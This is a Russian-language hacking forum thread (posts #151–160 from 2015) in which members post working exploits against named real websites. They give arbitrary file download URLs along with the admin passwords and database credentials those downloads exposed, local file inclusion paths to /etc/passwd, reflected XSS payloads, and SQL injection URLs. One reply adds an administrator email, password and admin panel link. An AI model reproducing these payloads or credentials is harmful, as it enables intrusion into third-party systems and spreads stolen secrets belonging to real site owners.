HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #151  
Старый 20.08.2015, 21:02
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию

Type: Arbitrary File Download

Target: tennismatchpoint.net

Vulnerable: www.tennismatchpoint.net/inc/forceDownload.php?file=../admin/index.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$PASSWORD[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'cesenatennis'[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$PASSWORD[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]'admin'[/COLOR][COLOR="#007700"]){[/COLOR][/COLOR
Логин: admin

Пароль: cesenatennis
 
Ответить с цитированием

  #152  
Старый 20.08.2015, 21:21
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию

Type: Arbitrary File Download

Target: requisur.com

Vulnerable: www.requisur.com/pdf/forcedownload.php?file=../configuration.php

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]var[/COLOR][COLOR="#0000BB"]$dbtype[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'mysqli'[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$host[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'localhost'[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'gtbaotmh_requisu'[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'gtbaotmh_requisu'[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$dbprefix[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'kxlo_'[/COLOR][COLOR="#007700"];
var[/COLOR][COLOR="#0000BB"]$password[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'Ry&f#4d*4$0vYk'[/COLOR][COLOR="#007700"];[/COLOR][/COLOR
 
Ответить с цитированием

  #153  
Старый 22.08.2015, 18:00
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию

Type: Local File Inclusion

Target: com-onlive.tv

Vulnerable: http://www.com-onlive.tv/wp-content/...9ldGMvcGFzc3dk

Type: Local File Inclusion

Target: garcinia.com-see.tv

Vulnerable: http://garcinia.com-see.tv/wp-conten...9ldGMvcGFzc3dk

Type: Local File Inclusion

Target: garcinia.com-see.tv

Vulnerable: http://www.truhlarstvi-rozkos.cz/fotogalerie.php?id=../../../../../../../../../../etc/passwd
 
Ответить с цитированием

  #154  
Старый 23.08.2015, 12:26
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

target:ykt.ru

Type:XSS-Reflected

Заходим сюда по линке

ykt.ru/search/image?q=&t=0&s=0&sid=14&ws=6941337%22%27&we=

В поиске вводим ">alert("WX")

И видим XSS .
 
Ответить с цитированием

  #155  
Старый 23.08.2015, 14:49
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

target:hochu.ua

Type : XSS-Reflected

Описание :

В поиске вводим :
">alert("WX")

Готовая линка : http://hochu.ua/search/?q=">alert("WX")
 
Ответить с цитированием

  #156  
Старый 24.08.2015, 19:21
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target: http://www.globexbank.ru/

type: XSS Reflected


Курс обмена валют:

Код:
Code:
">alert('Hello')
 
Ответить с цитированием

  #157  
Старый 24.08.2015, 23:19
hahanovB
Guest
Сообщений: n/a
Провел на форуме:
86887

Репутация: 2
По умолчанию

Type:SQL Injection

Target:
intergips.com.ua

Vulnerable:

Код:
Code:
http://intergips.com.ua/index.php?item_id=-3445%27%20UNION%20ALL%20SELECT%20CONCAT%280x717a787a71%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20CHAR%29%2C0x20%29%2C0x71786b7171%29--%20
 
Ответить с цитированием

  #158  
Старый 26.08.2015, 23:19
w0rm_
Guest
Сообщений: n/a
Провел на форуме:
4367

Репутация: 8
По умолчанию

Type: SQL Injection

Target: *.mystart.com (212 alexa rang)

PoC:

Код:
Code:
_ttp://apps2.mystart.com/ui/site/index.php?tb=vmndtxtb&cid=-2+union+select+1,user(),3,4+from+mysql.user+--
File_priv=Y
 
Ответить с цитированием

  #159  
Старый 27.08.2015, 19:52
kingbeef
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640

Репутация: 0
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Spoiler: admin and pass
roselynef@vmn.net
:adminlox
admin link : apps2.mystart.com/admin/
Добавил XSS : apps2.mystart.com/ui/site/index.php?tb='alert('SIXSS')
кек xss с sql норм так .
SIXSS

http://apps2.mystart.com/ui/site/in...27293c2f7363726970743e,3,4+from+mysql.user+--
 
Ответить с цитированием

  #160  
Старый 29.08.2015, 08:35
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Target:http://www.ecco-shoes.ru/search

Type:XSS-Reflected

Описание: Переходим в любой раздел "Для мужчин/женщин" . Ищем поиск по артиклу и вбиваем в оба поля .


Код:
Code:
">alert('Hello') .
а также

Код:
Code:
www.ecco-shoes.ru/shops/?country=UNION SELECT 1,2,3,'alert('SIXSS')',5,6 --&region=Архангельская+область&town=Архангельск



Да и вообще на этом сайте много XSS .
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ